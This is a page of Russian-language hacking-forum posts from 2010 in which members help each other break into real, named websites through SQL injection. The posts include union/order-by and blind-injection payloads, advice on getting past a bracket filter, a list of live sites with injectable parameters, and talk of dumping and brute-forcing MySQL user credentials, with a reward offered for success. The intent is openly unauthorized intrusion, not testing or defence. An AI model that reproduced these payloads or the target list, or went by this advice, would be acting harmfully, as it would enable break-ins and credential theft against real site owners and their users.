HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #71  
Старый 10.08.2010, 01:00
M@ZAX@KEP
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами: 8903558

Репутация: 60
По умолчанию

Teran901, попробуй значение параметра game увести в недопустимое, напр.
после game.asp?id=-1+order+by+10+--+
 
Ответить с цитированием

  #72  
Старый 10.08.2010, 01:00
stink200
Участник форума
Регистрация: 17.05.2010
Сообщений: 271
С нами: 8414966

Репутация: 44
По умолчанию

http://www.mp3hungama.com/music/genr...lect+1,+2,+3-- почему он мне не чего не выдаёт ?он вроде должен выдавать цифру с которой будем работать
 
Ответить с цитированием

  #73  
Старый 31.08.2010, 01:00
LiRvD08
Новичок
Регистрация: 03.01.2009
Сообщений: 2
С нами: 9132388

Репутация: 0
По умолчанию

Уважаемые форумчане, помогите плз разшевелить одну Blind SQL inject.
Есть баг

Цитата:


site/?news&id=139/**/and/**/1=1



Но при

Цитата:


site/?news&id=139/**/and/**/ascii(lower(substring(user(),1,1)))>100



Ворачевается на главную, есть вероятность что фильтрются скобки, как можно это обойти?
Подскажите какие есть нюансы при Blind SQL inject, или дайте ссылку. С плюсами не обижу.
Если все прокатит возможно хорошее вознагрождение!
 
Ответить с цитированием

  #74  
Старый 31.08.2010, 01:00
stan_q
Новичок
Регистрация: 01.08.2009
Сообщений: 12
С нами: 8830468

Репутация: 0
По умолчанию

Цитата:

Сообщение от LiRvD08

Уважаемые форумчане, помогите плз разшевелить одну Blind SQL inject.
Есть баг
Цитата:
site/?news&id=139/**/and/**/1=1
Но при
Цитата:
site/?news&id=139/**/and/**/ascii(lower(substring(user(),1,1)))>100
Ворачевается на главную, есть вероятность что фильтрются скобки, как можно это обойти?
Подскажите какие есть нюансы при Blind SQL inject, или дайте ссылку. С плюсами не обижу.
Если все прокатит возможно хорошее вознагрождение!

Попробуй вообще без скобок, зачем тебе они? Пробуй обычный order+by и select+union.

PS C плюсами ты погарячился, у тебя вес репы 0 :wink:
 
Ответить с цитированием

  #75  
Старый 31.08.2010, 01:00
LiRvD08
Новичок
Регистрация: 03.01.2009
Сообщений: 2
С нами: 9132388

Репутация: 0
По умолчанию

Цитата:

Сообщение от stan_q

Попробуй вообще без скобок, зачем тебе они? Пробуй обычный order+by и select+union.

Через order by кол-во колонок сразу подобрал, а вот union+select не пашет.
Мне этот сайт нужен, так что буду дальше копать.
 
Ответить с цитированием

  #76  
Старый 22.09.2010, 01:00
Hakera
Познающий
Регистрация: 02.09.2009
Сообщений: 64
С нами: 8785046

Репутация: -3
По умолчанию

http://203.10.121.98/deliver/content.asp?pid=38337 по этому запросу

Microsoft OLE DB Provider for SQL Server error '80004005'

Failed to update database "lpplc07" because the database is read-only.

/includes/webpagecontent.asp, line 156

Возможно что нить сделать?
 
Ответить с цитированием

  #77  
Старый 22.09.2010, 01:00
Hakera
Познающий
Регистрация: 02.09.2009
Сообщений: 64
С нами: 8785046

Репутация: -3
По умолчанию

http://www.libraryonline.com/default.asp?pID=30 С помощью Хелпера выбил Таблицу mysql.user и две колонки Password and User однако открыть их не как...

вот дырка тут есть, вот только не могу расчитать тама

Добавлено через 1 час 22 минуты
http://www.libraryonline.com/default.asp?pID=30
http://www.technosport.com/product_d...asp?PID=207%27
http://www.nineeagle.com/en/p.asp?pid=34%27
http://www.act-labs.com/scripts/prod...asp?Pid=851%27
http://www.hms.se/products/products.asp?PID=110%27
http://www.jorkyball.org/home/page.asp?pid=58%27
http://www.sangean.com/products/prod....asp?pid=11%27
http://www.anybus.com/products/products.asp?PID=140%27
http://www.hakkousa.com/detail.asp?PID=838%27
http://academy.softjoys.ru/index.php3?pid=65%27 (русский сайт компьютерной академии)))
http://www.smtd.org/displayPage.asp?pID=25%27
http://www.zonadostupa.ru/catal.php?pid=2'

http://www.uptime.ru/monitoring.php?pid=12%27
 
Ответить с цитированием

  #78  
Старый 22.09.2010, 01:00
stan_q
Новичок
Регистрация: 01.08.2009
Сообщений: 12
С нами: 8830468

Репутация: 0
По умолчанию

Цитата:

Сообщение от Hakera

две колонки Password and User однако открыть их не как...

Они пустые

Остальные брутить надо - там 4 ветка MySQL
 
Ответить с цитированием

  #79  
Старый 22.09.2010, 01:00
Hakera
Познающий
Регистрация: 02.09.2009
Сообщений: 64
С нами: 8785046

Репутация: -3
По умолчанию

Цитата:

Сообщение от stan_q

Они пустые

Остальные брутить надо - там 4 ветка MySQL

Тоесть вручную надо?)
 
Ответить с цитированием

  #80  
Старый 22.09.2010, 01:00
stan_q
Новичок
Регистрация: 01.08.2009
Сообщений: 12
С нами: 8830468

Репутация: 0
По умолчанию

Цитата:

Сообщение от Hakera

Тоесть вручную надо?)

Да
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.